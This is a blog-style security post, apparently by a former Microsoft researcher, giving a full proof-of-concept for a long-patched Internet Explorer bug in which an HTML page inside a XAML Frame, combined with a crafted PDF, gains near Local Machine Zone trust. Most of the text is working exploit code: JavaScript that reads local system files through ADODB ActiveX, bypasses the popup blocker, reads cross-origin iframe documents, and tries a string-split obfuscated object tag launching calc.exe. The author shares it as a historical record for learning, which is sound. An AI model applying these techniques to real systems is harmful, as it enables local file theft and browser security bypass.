After playing around for a while with XAML’s <Frame> element and some earlier PDF work, I noticed that loading an HTML page inside a XAML Frame seemed to inherit a surprisingly elevated security context — something close to the Local Machine Zone. Combined with a specially crafted PDF that loaded a local file into an iframe, the combination let a page read local files, bypass the popup blocker, and access cross-origin iframe documents.
<!-- index.xaml: entry point that frames mainhtml.html -->
<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
WindowTitle="XAML_PDF_PseudoLMZ">
<TextBlock HorizontalAlignment="Center" VerticalAlignment="Center">
<Bold>XAML_PDF_PseudoLMZ</Bold>
<LineBreak />
<Frame Width="800" Height="600" Source="mainhtml.html"/>
</TextBlock>
</Page><!-- mainhtml.html: runs inside the XAML Frame -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XAML_PDF_PseudoLMZ</title></head>
<body topmargin="0">
<font face="Tahoma" size="2">
<center>
<font size="5"><b>XAML_PDF_PseudoLMZ</b></font><br />
<font size="1">(needs Adobe Acrobat Reader installed and it <b>does not work</b> on Vista with Internet Protected Mode)</font>
</center>
<br />
<span id="mainMessage">
Click the Red Button thay says "<font color="red"><b>Click here to Access Local Files</b></font>" in the PDF.
We will load the <b>file:///c:/windows/setuplog.txt</b> inside the IFRAME by using the "Hacked PDF" which is described in
the previous bug.
<br /><br />
</span>
<center>
<iframe id="wbControl" src="" width="760" height="500"></iframe><br /><br />
</center>
<script language="JavaScript">
opener = "";
window[0].location = "hacked.pdf";
function wait_setuplogTxt()
{
try
{
// This xDomain is just a bonus: after the setuplog.txt is loaded (local file), we can access the "D"ocument of that IFRAME with no problems.
justCheckingThatWeCanAccessTheDocument = document.all.wbControl.Document;
document.all.mainMessage.style.display = "none";
setTimeout('writeLMZIframe_ADODB()',1000);
}
catch (e)
{
setTimeout('wait_setuplogTxt()',1000);
}
}
function writeLMZIframe_ADODB()
{
var xStream = '<font face="Tahoma" size="2">' +
'Perfecto. This IFRAME has now some LMZ privileges, but we can\'t write files.<br />' +
'This is our location: ' +
'<b>' + document.all.wbControl.Document.URL + '</b><br />Let\'s read the file <b>c:/windows/system32/eula.txt</b> using <b>ADODB</b>.<br /><br />' +
'<b><font color="blue"><center>Please, doubleclick inside the textarea to execute the code:</center></font></b>' +
'<textarea ondblclick="eval(this.value)" style="width:720px;height:380px;">' +
'oConn = new ActiveXObject("ADODB.Connection");\noRs = new ActiveXObject("ADODB.Recordset");\noConn.open("DRIVER={Microsoft Text Driver (*.txt; *.csv)};ReadOnly=;DBQ=C:\\\\windows\\\\system32\\\\");\n\nx = oRs.Open ("Select * From eula.txt", oConn, 1, 3, 1);\nvar fullString = "";\nwhile (!oRs.eof)\n{\n for (var i=0; i<oRs.Fields.Count; i++)\n {\n fullString+=oRs.Fields(i).Value;\n }\n fullString+="\\n";\n oRs.MoveNext();\n}\nfullString = "file:///c:/windows/system32/eula.txt\\n\\n" + fullString.replace(/null/g, "");\nalert(fullString);\n\n// Simple communication trick to execute a function of my parent.\ntop.opener = "writeLMZIframe_openPopUps()";';
'</textarea>' +
'</font>';
document.all.wbControl.Document.body.innerHTML = xStream;
}
function writeLMZIframe_openPopUps()
{
var xStream = '<font face="Tahoma" size="2">' +
'<b>Good!</b>. Now we will <b>bypass the popUp blocker</b>. As you can see, we are using a <font color="blue"><b>setTimeout</b></font> so we are sure that the ' +
'popUp blocker should stop them.<br /><br />' +
'<b><font color="blue"><center>Please, doubleclick inside the textarea to execute the code:</center></font></b>' +
'<textarea ondblclick="eval(this.value)" style="width:720px;height:380px;">' +
'window.openPopUps = function()\n{\n window.open("http://www.google.com");\n window.showModelessDialog("http://www.google.com");\n window.showHelp("http://www.google.com");\n window.showModalDialog("http://www.google.com");\n}\n\n// A Little delay of two seconds so no events are generated and the popUp blocker\n// should stop the popUps.\nsetTimeout("openPopUps();",2000);\n\n\n// Simple communication trick to execute a function of my parent.\ntop.opener = "writeLMZIframe_FailedExecution()";';
'</textarea>' +
'</font>';
document.all.wbControl.Document.body.innerHTML = xStream;
}
function writeLMZIframe_FailedExecution()
{
var xStream = '<font face="Tahoma" size="2">' +
'<b>Perfect!</b>. Well, we can do a lot of things because this is almost like being at the LMZ Zone. However, we can not ' +
'write files. Well, I still did not find out.<br />' +
'Keep in mind that the only reason not to execute files is because (yet) we can not write them. The XAML engine (good!) ' +
'is not allowing us to do that.<br /> Let\' see what happens with this classic:<br /><br />' +
'<object classid="cl' + 'sid' + ':111' + '111' + '11' + '-11' + '11-1' + '111-' + '111' + '1-1' + '111' + '111' + '111' + '11" co' + 'debas' + 'e="c:/' + 'windows/sys' + 'tem32/ca' + 'lc.exe"' + '></o' + 'bject><br /><br />' +
'<b><font color="blue"><center>Please, doubleclick inside the textarea to execute the code:</center></font></b>' +
'<textarea ondblclick="eval(this.value)" style="width:720px;height:120px;">' +
'document.body.insertAdjacentHTML(\'beforeEnd\',\'<obj' + 'ect cla' + 'ssid="cls' + 'id:11111' + '111-' + '11' + '11-111' + '1-111' + '1-111' + '11111' + '1111" cod' + 'ebas' + 'e="c:/w' + 'indows/sys' + 'tem32' + '/calc.ex' + 'e"></object>\');' +
'</textarea><br />' +
'Well, if we copy the calc.exe to C:\\WINDOWS\\Downloaded Program Files\\ at the right moment, it will execute. However, "the right moment" is not working automatically. <br /><br />' +
'So no execution yet. <b>End of Interactive Demo :)</b>' +
'</font>';
document.all.wbControl.Document.body.innerHTML = xStream;
}
function communication()
{
eval(window.opener);
window.opener = "";
}
setInterval("communication()",1000);
setTimeout("wait_setuplogTxt();",2000);
</script>
</body>
</html>The core idea was that a page loaded inside a XAML <Frame> element ran with elevated trust, and combining that with the PDF-based local file loader created a context where normal cross-origin checks simply didn’t apply. From there it was straightforward to read local files with ADODB, open popups that bypassed the blocker, and access iframe document objects from other origins. The XAML engine did, thankfully, block actual file writes — so full code execution wasn’t reached, but the information-disclosure surface was quite wide. This only affected pre-Vista systems without Protected Mode enabled.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.
Read other posts